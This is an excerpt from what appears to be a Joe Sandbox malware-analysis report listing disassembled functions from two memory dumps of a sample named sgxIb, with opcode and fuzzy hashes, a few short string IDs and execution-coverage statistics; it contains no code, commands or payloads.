                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bed46b36b03090f39a9a91d1bca8243f5befea28cc0a65dd3dfeff88085690c
                                                                                                            • Instruction ID: 3f33bf0640037c8cd70d91cbc6fd86559a4910114b046089da7485451933b18b
                                                                                                            • Opcode Fuzzy Hash: 6bed46b36b03090f39a9a91d1bca8243f5befea28cc0a65dd3dfeff88085690c
                                                                                                            • Instruction Fuzzy Hash: 6321E130B101189FCF44DB6DE96069EB7B7EBC4314F618529E909EB350EB30ED818B94
                                                                                                            Function 068405E0 Relevance: .1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 97ad162245dfbe452c40e8b111bf71fc246a88f85bdb88c25fbbeaf4b13a879b
                                                                                                            • Instruction ID: 5e857cb4e0fe9000c12500d5c82aa11963be682fe5a02985be6b716459f7d157
                                                                                                            • Opcode Fuzzy Hash: 97ad162245dfbe452c40e8b111bf71fc246a88f85bdb88c25fbbeaf4b13a879b
                                                                                                            • Instruction Fuzzy Hash: 3021F5B5D012189FCB50DF99D488ADEFBF4EB48320F14815AE908EB255D7759A44CFA0
                                                                                                            Function 06854318 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 32e057b262551c220c247b532697e225f4e1359c422bfbd83022209b17a68688
                                                                                                            • Instruction ID: 069e36bc8dffcc947a0351d3f6c390c86a03a4c720a08540ca6c9a6e7d2b0a64
                                                                                                            • Opcode Fuzzy Hash: 32e057b262551c220c247b532697e225f4e1359c422bfbd83022209b17a68688
                                                                                                            • Instruction Fuzzy Hash: 3411D635B102100FDF559A7C9800BAFB7EADBCA315F15883EE94DC7361DA64DC8283A5
                                                                                                            Function 068540E0 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 03e870092929baf87ccc80634e8a84a06293b4d1a6a0eae4170d4e518a975738
                                                                                                            • Instruction ID: 2ad4f851e4e90bbbbede8280022495ef82db999340ff666aae7e0e590474c919
                                                                                                            • Opcode Fuzzy Hash: 03e870092929baf87ccc80634e8a84a06293b4d1a6a0eae4170d4e518a975738
                                                                                                            • Instruction Fuzzy Hash: 55118E32B141299FDB549668CC156AE73FAABC8314B01443AD90AE7340EE749C028BD1
                                                                                                            Function 0685F2B8 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bf47bcfb28cb96ce8542f31bf818047245fa8821808edddfa2de68e49c165c5
                                                                                                            • Instruction ID: da95ad898cfa56239c2aa2c29718a242db2e81bd1834e24d46791383b07ca4fe
                                                                                                            • Opcode Fuzzy Hash: 4bf47bcfb28cb96ce8542f31bf818047245fa8821808edddfa2de68e49c165c5
                                                                                                            • Instruction Fuzzy Hash: CB01F534F041900FCB62867CA42477E6BE2CBCA214F15886EEA0ACB741DD54DC0347A6
                                                                                                            Function 06840550 Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6fc6fe210cf82ead67b6cafb95829e6cc8b2bbfd933b9e00f8fb0197214c1575
                                                                                                            • Instruction ID: 2917b620d3d62f0fc57a74ed8ab90865574f203cb985567d27043580d76226e2
                                                                                                            • Opcode Fuzzy Hash: 6fc6fe210cf82ead67b6cafb95829e6cc8b2bbfd933b9e00f8fb0197214c1575
                                                                                                            • Instruction Fuzzy Hash: B71126B680034D9FDB10DF99C845BEEBFF5EB48320F148459EA18A7251C339A958DFA1
                                                                                                            Function 0685A420 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f26eab5769b0a5791de5762ab675de6937d91d2cd5ea51f92958672ff1873033
                                                                                                            • Instruction ID: 9c38c44b8b5b6a1284f02a3d79d83dc7af38bcd92807b232e742453675e9f041
                                                                                                            • Opcode Fuzzy Hash: f26eab5769b0a5791de5762ab675de6937d91d2cd5ea51f92958672ff1873033
                                                                                                            • Instruction Fuzzy Hash: BD114530F005110FCB69DA78E49476F77E2EB8A308F11856AE90AC7741ED20DD0283A5
                                                                                                            Function 06853D99 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8c82612e51a8895bc83057dea73d1b2b261c740e72e57fc31511acc7518fbad
                                                                                                            • Instruction ID: 61003773e2ddfb6ca0d8356bc5a08c582f615cf5aca4e2e2edf747d70a8d00df
                                                                                                            • Opcode Fuzzy Hash: b8c82612e51a8895bc83057dea73d1b2b261c740e72e57fc31511acc7518fbad
                                                                                                            • Instruction Fuzzy Hash: B121CEB5D01259AFCB10DF9AD984ADEFBF4FB48310F10812AE918B7640D374AA54CFA5
                                                                                                            Function 06840D63 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 66cb4c307923b8faade6f4fea5927fc660b9d83390fff0d5af43811dc8fc91e0
                                                                                                            • Instruction ID: 24c3a79e41ab83ed7a52731b25179e6f95f751c8f754d9a4698035be394c78cc
                                                                                                            • Opcode Fuzzy Hash: 66cb4c307923b8faade6f4fea5927fc660b9d83390fff0d5af43811dc8fc91e0
                                                                                                            • Instruction Fuzzy Hash: F01126B68003499FDB10DF99C945BEEBBF5EF48320F148419EA58A7250C339A558DFA1
                                                                                                            Function 06853DA0 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b6f829ea201993a4e9c076a6400e10f3dfe1bbef8e8f710230c2cdd00c3d6df0
                                                                                                            • Instruction ID: 7258a7fbfca2e4adcbc910a10363e7c8743d74bf24902d4ee917070913d85208
                                                                                                            • Opcode Fuzzy Hash: b6f829ea201993a4e9c076a6400e10f3dfe1bbef8e8f710230c2cdd00c3d6df0
                                                                                                            • Instruction Fuzzy Hash: 3111CFB5D01259AFCB00DF9AD884ACEFBF4FB48310F10812AE918B7240D375A954CBA5
                                                                                                            Function 06854328 Relevance: .1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ef1fc4c2d1069e5081238e003d859039acc1ba19a650c40d93c9b7a484ef1741
                                                                                                            • Instruction ID: 6e5a8773374f6c40972aed1f49af0b3faefa54ba1dea06da899626c479dbe2a3
                                                                                                            • Opcode Fuzzy Hash: ef1fc4c2d1069e5081238e003d859039acc1ba19a650c40d93c9b7a484ef1741
                                                                                                            • Instruction Fuzzy Hash: C101D130B101200BDB64956DA404B6FA3DBDBCA714F20883EEA0EC7354DE65DC8243A5
                                                                                                            Function 068540D1 Relevance: .1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8ebdbf43a3d752be87f25cd561a6e2314cdafb0da290dc32819ef72c7a8002bb
                                                                                                            • Instruction ID: 9d15620912909b8522ff28cfcb59018168950e689f446f0e03b69a442b39f26d
                                                                                                            • Opcode Fuzzy Hash: 8ebdbf43a3d752be87f25cd561a6e2314cdafb0da290dc32819ef72c7a8002bb
                                                                                                            • Instruction Fuzzy Hash: B101DF32B141199BDB98DA68DD127EF73FBABC8311F01403AD90AE7244EE649C4287D6
                                                                                                            Function 0685F2C8 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b6ca0f808a6648963cb255fd672494d90674ddca7c52bd0ee53cfeaa9cf7608f
                                                                                                            • Instruction ID: 4c61e849a89a16a85be6ecc1e179d2dff3230c14ff03d57b4e3bebf30ffa7a3f
                                                                                                            • Opcode Fuzzy Hash: b6ca0f808a6648963cb255fd672494d90674ddca7c52bd0ee53cfeaa9cf7608f
                                                                                                            • Instruction Fuzzy Hash: AE018C35F000201FDF659A7DA454B6F62DADBC9728F15883AEA0EC7380EE65DC034796
                                                                                                            Function 0685A430 Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 229f3126de1b0bf8186bcadf031fc0cd383abfe619247947a8f7b2e24d939631
                                                                                                            • Instruction ID: d5c81c0fadebca432c6259e37f5a3e2963c37a3dec230fbfc4d3a542db7150a3
                                                                                                            • Opcode Fuzzy Hash: 229f3126de1b0bf8186bcadf031fc0cd383abfe619247947a8f7b2e24d939631
                                                                                                            • Instruction Fuzzy Hash: 7901D630B104100FCB64E6BCE59471F73D6EB89718F104529E50EC7744DD15DC0183D4
                                                                                                            Function 0684033B Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d65b7d1ffa3e862b992d124a5cdbace96bf036dd648e4b534406a84d61be6800
                                                                                                            • Instruction ID: c5efd0b8d078ad2d8bff23ec794c2f37931a5059b1c5f94e95befbc248228a22
                                                                                                            • Opcode Fuzzy Hash: d65b7d1ffa3e862b992d124a5cdbace96bf036dd648e4b534406a84d61be6800
                                                                                                            • Instruction Fuzzy Hash: E3F03175E112099FDBD0EBB9A9017EF7FB4AB45215F004476EB09EB100E230CA118791
                                                                                                            Function 0685C908 Relevance: .0, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ed534198a83087b9f58ab279f25d71648628b6a4ff9ce066d1fb521f74958c35
                                                                                                            • Instruction ID: 5ce878df7ed5beb8f6c609ac0d3e29d1e8fcc93835f3e48582e11c12b16e95dc
                                                                                                            • Opcode Fuzzy Hash: ed534198a83087b9f58ab279f25d71648628b6a4ff9ce066d1fb521f74958c35
                                                                                                            • Instruction Fuzzy Hash: 9E01A431F202289BCF64AA79E851A9EB776F785358F10453DE905E7344DB32A8058BD4
                                                                                                            Function 0684026D Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 88291cf300ddbf54fccb40f0bf3d6e9fd9dd8149532defeb1bc2444d3e13a151
                                                                                                            • Instruction ID: 849db1ef61da00fab9ec1db0b4e51f4e7405f18102e6beec68c763cd711d23b5
                                                                                                            • Opcode Fuzzy Hash: 88291cf300ddbf54fccb40f0bf3d6e9fd9dd8149532defeb1bc2444d3e13a151
                                                                                                            • Instruction Fuzzy Hash: F5F08C35B002188FDB00DBA9D840BEEBBF1FF88322F148565E619E72D0C63499118BA0
                                                                                                            Function 06840B28 Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 776a0743031e28800a5e15bd1613f8b33ae390534ca5fd8eadbdd35b0a600e0f
                                                                                                            • Instruction ID: e860b727e27f5e7985ccc48e5cbc880d1c67d75ca7e4ceeab1e322357c4b7a82
                                                                                                            • Opcode Fuzzy Hash: 776a0743031e28800a5e15bd1613f8b33ae390534ca5fd8eadbdd35b0a600e0f
                                                                                                            • Instruction Fuzzy Hash: B2F082323002196B8B05AF98AC449AF7FABEBC8260B008429FE09D3350DB319E1597B5
                                                                                                            Function 06840348 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd9e3912f9540e1df8d850dc4f3598dda6f98abde82960b4f41d8353d579efd9
                                                                                                            • Instruction ID: d4bda02d3ca6fd9886498bf0877aa99ebc9173f97255fc7264c80035c50754c1
                                                                                                            • Opcode Fuzzy Hash: dd9e3912f9540e1df8d850dc4f3598dda6f98abde82960b4f41d8353d579efd9
                                                                                                            • Instruction Fuzzy Hash: E7E01271E102199F8B90EB79590169FBBF8AB45250F004475DA09E3200E670C60087D1
                                                                                                            Function 06856588 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c97b323c6c07731fd05efdeb7c9c07fc802d915504c021ace044b497cba15494
                                                                                                            • Instruction ID: f811bc028bc80ec41af2aa239318ec02da14fce91e31465734d5440c58b6aecf
                                                                                                            • Opcode Fuzzy Hash: c97b323c6c07731fd05efdeb7c9c07fc802d915504c021ace044b497cba15494
                                                                                                            • Instruction Fuzzy Hash: 91E0D871D581449FDF61CBB48A053AD77B49B02218F6649E6CC09DB256F135CA418782
                                                                                                            Function 06842A2B Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dee2407bcb12d4fb92b34cf8ca6493e70322b3469b806e709a9854a80049bef1
                                                                                                            • Instruction ID: d66ac7d24e71bbe9db4a7f4f25212468dba7c413ae3884edf804c07da4e09413
                                                                                                            • Opcode Fuzzy Hash: dee2407bcb12d4fb92b34cf8ca6493e70322b3469b806e709a9854a80049bef1
                                                                                                            • Instruction Fuzzy Hash: 63E0C239B140389B0E50B66CA5A01ADB353EBC826831440A6EE05D7245DF258E1347E9
                                                                                                            Function 06856598 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1fbe91d45b4951909707f0a863feff4f7aff157cf502dab239eb20b0e46dfe4
                                                                                                            • Instruction ID: 19e7fb5bf1b8b234cb6e8971857bfff289eba5e69caffb9cb6eacc032ce2c519
                                                                                                            • Opcode Fuzzy Hash: e1fbe91d45b4951909707f0a863feff4f7aff157cf502dab239eb20b0e46dfe4
                                                                                                            • Instruction Fuzzy Hash: B0E0C270E10208ABDF60CEB4C90575EB3ACE701208FA185A4DD09CB216F276CA418780

                                                                                                            Non-executed Functions

                                                                                                            Function 068577B8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: c705379302986b0c941495a335d3fb464b43e90bd8f6227c3e51ab1155b08b36
                                                                                                            • Instruction ID: 56df2e6c352ec12192bdb67a5c7faf169f142e0c2d6e8343c372ad6a03bff7e3
                                                                                                            • Opcode Fuzzy Hash: c705379302986b0c941495a335d3fb464b43e90bd8f6227c3e51ab1155b08b36
                                                                                                            • Instruction Fuzzy Hash: 3E122D30E002198FDB68DF69C954AADB7F2BF88304F218969D909EB354DB309D85CF91
                                                                                                            Function 0685AA50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 9fe7e54e9fa3825e8f2c5ce6d8a98119c6a561db68f0c78bebb22f542c596800
                                                                                                            • Instruction ID: 7e21b3055af5bd39b0bc4f523c8ac0949bee647d358a3b8983cbbc9e1c721d2d
                                                                                                            • Opcode Fuzzy Hash: 9fe7e54e9fa3825e8f2c5ce6d8a98119c6a561db68f0c78bebb22f542c596800
                                                                                                            • Instruction Fuzzy Hash: 5C916D30E00209DFEB68EB64D995B6E77F2BF84305F118A29E806DB254DB749C45CB91
                                                                                                            Function 068571B8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: 2033b394f24cb1366b098c67f8269188bd722e5a9c55f0e414f9c62fe700354f
                                                                                                            • Instruction ID: 6fddc178cb6ea9fbe2d10ff120e89ea7be7f54e08f831551a156d213934f81f3
                                                                                                            • Opcode Fuzzy Hash: 2033b394f24cb1366b098c67f8269188bd722e5a9c55f0e414f9c62fe700354f
                                                                                                            • Instruction Fuzzy Hash: 51F14D34A00208CFDB58EFA8D554A6EB7F3FF84305F658528D8059B798DB35AC86CB91
                                                                                                            Function 0685BB30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: da47b1a3147b606b8ca69999d97328879c4a53b271e7a6453db6532e9e4daef0
                                                                                                            • Instruction ID: 0331256554f6cde611eca9a2ab4e3bff0f36d812a89d4e93c658a56af2ff6d72
                                                                                                            • Opcode Fuzzy Hash: da47b1a3147b606b8ca69999d97328879c4a53b271e7a6453db6532e9e4daef0
                                                                                                            • Instruction Fuzzy Hash: 5671EF30E002198FDBA8DF68D4606AEB7F2FF95315B118869E90ADF254DF70AD45CB81
                                                                                                            Function 068584F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: f4ac35bb793dc7d067c8dab570496bd0136027475342bccfc3f94926e0b2a2bb
                                                                                                            • Instruction ID: bef956767e94b071e67c66179985b5732bdf999c0363420c927374752b8a746c
                                                                                                            • Opcode Fuzzy Hash: f4ac35bb793dc7d067c8dab570496bd0136027475342bccfc3f94926e0b2a2bb
                                                                                                            • Instruction Fuzzy Hash: 8AB15B70E002288FDB54EB69D5906AEB7F2FF84305F25882AD406DB354DB74DC86CB91
                                                                                                            Function 06858908 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            • Opcode ID: b4cfeb2ae14eab7cfffca386b35f015199252a0c2df4ee63dc3f92f0462698f6
                                                                                                            • Instruction ID: 7564382015ba74ce6714757b23fbe90be62475a7ffdc21cc9c1c6b8c9c58b037
                                                                                                            • Opcode Fuzzy Hash: b4cfeb2ae14eab7cfffca386b35f015199252a0c2df4ee63dc3f92f0462698f6
                                                                                                            • Instruction Fuzzy Hash: B751D370B002259FDB54EB28D541A6E77E2FF84304F15896AE905DF795DB30EC41CBA2
                                                                                                            Function 0685ADD8 Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 7aedc968089ba3729ff6d062c12210c6dea564f9539b12eea128ec8731eac34a
                                                                                                            • Instruction ID: 1c99383890997f8e44b81e1323e7e8cb167ee6af318e768f1a2a2d5d9345ba53
                                                                                                            • Opcode Fuzzy Hash: 7aedc968089ba3729ff6d062c12210c6dea564f9539b12eea128ec8731eac34a
                                                                                                            • Instruction Fuzzy Hash: 0651A030E102088FDB69EA68D9906AEB7F2EF88315F154A2AD915DB354DB30EC45CB91

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.2%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:163
                                                                                                            Total number of Limit Nodes:9
